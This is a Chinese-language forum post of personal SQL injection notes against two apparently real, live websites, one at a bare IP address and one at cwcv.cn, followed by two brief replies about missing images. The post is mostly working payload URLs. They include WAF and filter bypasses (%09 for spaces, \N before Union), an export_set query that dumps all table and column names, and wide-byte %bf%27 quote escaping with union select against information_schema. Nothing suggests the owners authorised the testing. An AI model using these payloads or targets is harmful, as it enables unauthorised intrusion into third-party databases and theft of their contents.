两个注入笔记

admin · 发表于 2016-4-13 21:44:27

阔别上一个注入好久了已经：http://user.qzone.qq.com/775983572/blog/1437492568
这里我换了个基友@Mirr0r 么么哒～

第一个注入：
http://147.8.205.94/newsview.php?id=8

http://147.8.205.94/newsview.php?id=8 and 1=1，有ｗａｆ，当前链接已被重置

怀疑过滤空格，%09绕过，

http://147.8.205.94/newsview.php?id=8%09order%09by%092，访问正常，判断两个字段
http://147.8.205.94/newsview.php?id=8%09union%09select%091,2 访问出错，怀疑union或者是select被过滤
http://147.8.205.94/newsview.php?id=8%09Union%09selEct%091,2 大小写失败
http://147.8.205.94/newsview.php?id=\NUnion%09selEct%091,2 利用\Nunion 成功：

读取数据库，用户 http://147.8.205.94/newsview.php?id=\NUnion%09selEct%09version(),database()：

读取所有表名、字段语句:http://147.8.205.94/newsview.php?id=\NUnion%09selEct%09%28Select+export_set%285,@:=0,%28select+count%28*%29from%28information_schema.columns%29where@:=export_set%285,export_set%285,@,table_name,0x3c6c693e,2%29,column_name,0xa3a,2%29%29,@,2%29%29,2

第二个注入点http://www.cwcv.cn/cert/index.php?id=admin
加个单引号就知道要用宽字节注入了：

http://www.cwcv.cn/cert/index.php?id=admin%bf%27 后面还有个单引号，

不能使用“--”，就用#闭合，get请求需要把# url编码：
http://www.cwcv.cn/cert/index.php?id=admin%bf%27%09or%091=1%23 使用or 1=1语句成立，因为当admin%bf%27以后，admin就变admin縗了，两者不一样了不能使用and，只能使用or，或，1=1永远为真：

http://www.cwcv.cn/cert/index.php?id=admin%bf%27%09union%09select%091,2,3%23 正好三列：

因为过滤tables，所以通过information_schema.columns读取表名（columns表也有table_name这个列）http://www.cwcv.cn/cert/index.php?id=admin%df%27%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.columns%09where%09table_schema=0x63726d73%23（这里空格过滤，所以使用%09，也可以使用%0a、/**/等，0xxxxx是库的16进制）

显示全部楼层 · 发表于 2016-4-28 22:48:11

图片没了

admin · 发表于 2016-4-28 22:56:51

Mr.冷雪发表于 2016-4-28 22:48
图片没了

http://mp.weixin.qq.com/s?__biz= ... 08bd55e13830123f#rd

两个注入笔记

浏览过的版块